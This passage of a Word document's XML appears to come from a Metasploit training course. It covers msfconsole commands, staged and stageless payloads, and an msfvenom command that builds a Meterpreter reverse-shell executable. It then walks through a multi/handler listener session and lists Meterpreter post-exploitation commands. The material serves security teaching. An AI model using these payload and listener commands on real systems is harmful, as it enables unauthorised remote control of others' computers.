        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Finds a module by name, CVE, or platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Loads a chosen module to work with</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">show options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Lists the settings a module needs (target IP, port, payload, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">set</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Assigns a value to one of those options</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">run</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Executes the loaded module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">back</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Unloads the current module without closing msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Lists and interacts with active sessions opened on compromised targets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOST / RPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the remote (target) host and port being attacked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST / LPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the local (attacker) host and port that a reverse payload calls back to.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Payloads: Staged vs Stageless</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1754"/>
        <w:gridCol w:w="3411"/>
        <w:gridCol w:w="4581"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1754"/>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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3411"/>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Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4581"/>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How It Works</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="175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Staged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3411"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">windows/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4581"/>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Sends a tiny first-stage payload that then downloads and loads the full, larger payload (like Meterpreter) over the connection — smaller initial footprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="175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Stageless</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3411"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">windows/shell_reverse_tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4581"/>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The complete payload is sent in one piece, a single self-contained package — simpler, but larger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">■ Staged vs stageless</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Staged:     [small stager] --sent--&gt; target --downloads--&gt; [full payload runs]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Stageless:  [complete payload] --sent in one piece--&gt; target --runs immediately--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MSFvenom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is Metasploit's standalone tool for generating a payload file in the exact format needed (an .exe, an .elf, a web shell, etc.), independent of msfconsole.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Illustrative MSFvenom command</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe -o shell.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 Listener Setup and Meterpreter Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A reverse payload needs something on the attacker side waiting for the connection — the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">listener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, usually set up with Metasploit's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">multi/handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> module matching the same payload type, LHOST and LPORT used when the payload was generated.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Illustrative multi/handler setup and session (walkthrough)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 &gt; use exploit/multi/handler</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 exploit(multi/handler) &gt; set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 exploit(multi/handler) &gt; set LHOST 192.168.56.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 exploit(multi/handler) &gt; set LPORT 4444</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 exploit(multi/handler) &gt; run</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.56.1:4444</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Sending stage (175174 bytes) to 192.168.56.102</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Meterpreter session 1 opened</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pP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2924"/>
        <w:gridCol w:w="6822"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6822"/>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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">sysinfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Shows the target's OS and architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">getuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Shows which user account the session is running as</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
